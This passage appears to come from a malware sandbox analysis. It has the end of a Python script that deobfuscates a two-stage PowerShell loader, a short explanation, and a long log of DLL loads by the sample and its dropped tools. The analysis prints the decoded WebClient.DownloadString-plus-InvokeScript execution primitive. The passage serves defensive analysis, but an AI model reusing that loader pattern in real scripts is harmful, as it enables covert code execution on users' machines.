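    runner = resolve("*ke*pt", INVOKE_COMMAND_METHODS, False)  # -ilike '*ke*pt'
    return {
        "path": path,
        "lookups": [getter, cmdlet, method, runner],
        "equivalent": f"$ExecutionContext.InvokeCommand.{runner}((New-Object Net.WebClient).{method}('{path}'))",
    }


if __name__ == "__main__":
    for stage in (decode_first_stage(), decode_second_stage()):
        print(" -> ".join(stage["lookups"]))
        print("   ", stage["equivalent"])
```

Both stages collapse to the same primitive: read a dropped .t file through WebClient.DownloadString, which accepts a local path as a file URI, and execute the content, first via Invoke-Expression and then via $ExecutionContext.InvokeCommand.InvokeScript, which is what the "Obfuscated command line found" and "Suspicious powershell command line found" signatures are reacting to. The [6] index is the brittle part of the obfuscation: it only resolves to InvokeCommand if Get-Member orders EngineIntrinsics members as shown in the table, so the same script deobfuscates differently on a host where that order changes.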
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: duser.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: chartv.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: usp10.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msls31.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dispex.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeSection loaded: aclui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Section loaded: esscli.dll
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe | Section loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe | Section loaded: aclui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
